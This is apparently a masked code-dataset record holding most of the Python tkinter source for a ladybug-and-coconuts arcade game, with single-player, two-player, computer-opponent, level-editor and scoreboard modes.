Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, 
data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + 
data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\ndef hitScaryBug(data):\n for bug in data.scaryBug:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 *\n data.r):\n if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + \n 1.5 * data.r):\n data.hit = True\n data.lives = 0\n data.levelEditorLives = 0\n if data.mode == '2Player' or data.mode == 'AI':\n if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y +\n data.r):\n if (bug.x >= data.player1X - data.r and bug.x <= data.\n player1X + data.r):\n data.winner = 'player2'\n if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y +\n data.r):\n if (bug.x >= data.player2X - data.r and bug.x <= data.\n player2X + data.r):\n data.winner = 'player1'\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\n<mask token>\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n 
data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef playerRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(2 * data.width / 3, 660, text=\n \"\"\"The greater the level, the more points get\n added to your score!\"\"\"\n , font='Arial 15 bold', fill='yellow')\n if data.hit == True:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! 
Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n canvas.create_text(data.width / 2, 280, text='Score: %d' % data.\n score, font='Arial 13 bold', fill='yellow')\n if data.level >= 8:\n madeIt(canvas, data)\n drawHome(canvas, data)\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n 
data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\n<mask token>\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\ndef powerupTimerFired(data):\n for coconut in data.coconuts1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n hit2Player(data)\n for coconut in data.coconuts2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n 
data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef twoPlayerRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts1:\n coconut.draw(canvas)\n for coconut in data.coconuts2:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill\n ='yellow')\n winner(canvas, data)\n drawHome(canvas, data)\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! 
Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\n<mask token>\n\n\ndef drawButtons(canvas, data):\n data.font, data.fill = 'Helvetica 13 bold', 'yellow'\n canvas.create_text(data.medX, data.YST, text='Your Speed:', 
font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font)\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font)\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font)\n canvas.create_image(data.easyX, data.medX, image=data.drizzle)\n canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data.\n font, fill=data.fill)\n canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font)\n canvas.create_image(data.medX, data.medX, image=data.rain)\n canvas.create_text(data.medX, data.medX, text='Rain', font=data.font)\n canvas.create_image(data.hardX, data.medX, image=data.thunderstorm)\n canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font)\n canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyY, data.last, image=data.yes)\n canvas.create_text(data.easyY, data.last, text='Yes', font=data.font)\n canvas.create_image(data.last, data.last, image=data.no)\n canvas.create_text(data.last, data.last, text='No', font=data.font)\n changeEnter(canvas, data)\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef editorRedrawAll(canvas, data):\n canvas.create_image(data.width / 
2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.S_P - 10, text=\n 'Edit Your Level!', font='Arial 23 bold', fill='yellow')\n drawButtons(canvas, data)\n drawHome(canvas, data)\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if 
data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\ndef levelCreatedRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n if data.powerUpsEditor == True:\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data.\n levelEditorLives, font='Arial 20 bold', fill='yellow')\n canvas.create_text(data.width / 2, 660, text=\n \"\"\"You lose a life for hitting a drop\n & don't get eaten!\"\"\",\n font='Arial 15 bold', fill='yellow')\n if data.levelEditorLives <= 0:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! 
Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n if data.level > 1:\n winEditor(canvas, data)\n drawHome(canvas, data)\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if 
(data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\ndef AISwitchBug(data, distance):\n for scaryBug in data.scaryBug:\n if (data.player1Y - data.r - scaryBug.y <= distance and data.\n switchOnProgress == False):\n if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data\n .player1X + data.r):\n return True\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n 
addPowerUpsAI(data)\n\n\n<mask token>\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\n<mask token>\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\ndef powerUpAITimerFired(data):\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n if 
data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\n<mask token>\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! 
You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\ndef helpKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\n<mask token>\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class 
Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef init(data):\n data.score = 0\n data.mode = 'splashScreen'\n data.timerDelay = 100\n data.height = 800\n data.width = 800\n data.speed = 10\n data.speedAI = 12\n data.speedAI2 = 12\n data.switchOnProgress = False\n data.r = 25\n data.cx = 280\n data.cy = 750\n data.onLeft1, data.onLeft2 = True, True\n data.win = False\n data.coconuts = []\n data.powerUps = []\n data.coconuts1 = []\n data.coconuts2 = []\n data.coconutsAI1 = []\n data.coconutsAI2 = []\n data.invincible = []\n data.pauseDrops = False\n data.pause1Drop = False\n data.pause2Drop = False\n init1(data)\n\n\n<mask token>\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = 